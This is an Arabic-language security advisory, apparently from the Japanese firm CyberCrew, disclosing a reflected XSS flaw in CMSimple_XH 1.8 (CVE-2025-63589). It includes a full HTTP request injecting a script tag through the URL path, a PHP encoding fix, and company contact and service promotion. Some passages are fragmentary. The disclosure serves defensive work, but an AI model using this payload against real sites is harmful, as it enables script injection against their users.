
إثبات مفهوم لـ XSS المنعكس لـ CMSimple_XH 1.8 مع إدخال نص برمجي غير مصادق عبر أجزاء مسار غير منقاة، بما في ذلك تسجيل CVSS 6.1 ومثال معالجة بلغة PHP.
تاريخ الاكتشاف: 6 أكتوبر 2025
المنتجات: CMSimple_XH (نظام إدارة محتوى مفتوح المصدر يعمل بالملفات المسطحة)
الإصدارات المتأثرة: 1.8
CVE(s): CVE-2025-63589
المصادقة المطلوبة: لا شيء (بدون مصادقة)
نوع الهجوم: Cross-Site Scripting المنعكس (XSS)
CVSS v3.1 المقدر: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (متوسط)
تتقبل وحدة التحكم الأمامية في index.php أجزاء المسار الديناميكية (المستخدمة للتوجيه إلى القوالب/الصفحات) وتمرر تلك القيم إلى عرض القالب. لا يقوم الكود بتنظيف أو ترميز HTML بشكل صحيح لأجزاء المسار هذه قبل إدراجها في السمات وروابط href. ونتيجة لذلك، ينعكس طلب URI مصمم خصيصًا يحتوي على أحرف مثل "> ووسوم محقونة (مثل <script>...</script>) حرفيًا في مخرجات HTML ويتم تنفيذه بواسطة المتصفح.
تشمل نقاط الانعكاس النموذجية ما يلي:
actionhref في روابط التنقل/القائمة<nav class="locator">)نظرًا لأن الإدخال ينتهي في سياقات سمات HTML ومحتوى الروابط، فإن ترميز السمات القياسي مطلوب ولكنه مفقود.
الطلب:
POST /cmsimplexh/index.php/gjtqw"><script>alert(1)</script>co2cu HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates/TEMPLATE-overlay_03
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 32
search=Search...&function=search

الاستجابة:


ينعكس الحمولة المحقونة gjtqw"><script>alert(1)</script>co2cu غير مشفرة في روابط القائمة، ومسار التنقل، وإجراء نموذج البحث، وروابط التذييل، مما يؤدي إلى تنفيذ السكريبت عند عرض الصفحة.
$safe_segment = rawurlencode($segment); // path-safety
$action = '/cmsimplexh/index.php/' . $safe_segment;
echo '<form action="' . htmlspecialchars($action, ENT_QUOTES, 'UTF-8') . '">';
HttpOnly)ご質問・ご相談などございましたら、お気軽にご連絡ください。

📞 هاتف: 03-6853-5823
📧 البريد الإلكتروني: [email protected]
| 項目 | 内容 |
|---|---|
| 会社名 | 株式会社CyberCrew |
| 所在地 | 東京都千代田区外神田1-18-13 秋葉原ダイビル6階 |
組織の脆弱性を多角的に分析し、最適な改善策を提案します。
標的型・シナリオ型・LLMペンテスト まで対応。
機密情報の流出を早期に検知し、迅速に対応。
実践的な攻撃シナリオに基づく防御力評価を実施。
開発初期段階からセキュリティを考慮した設計を支援します。
🌐 公式サイト:https://www.cybercrew.co.jp
🕒 CyberCrew — شريكك الموثوق في الأمان.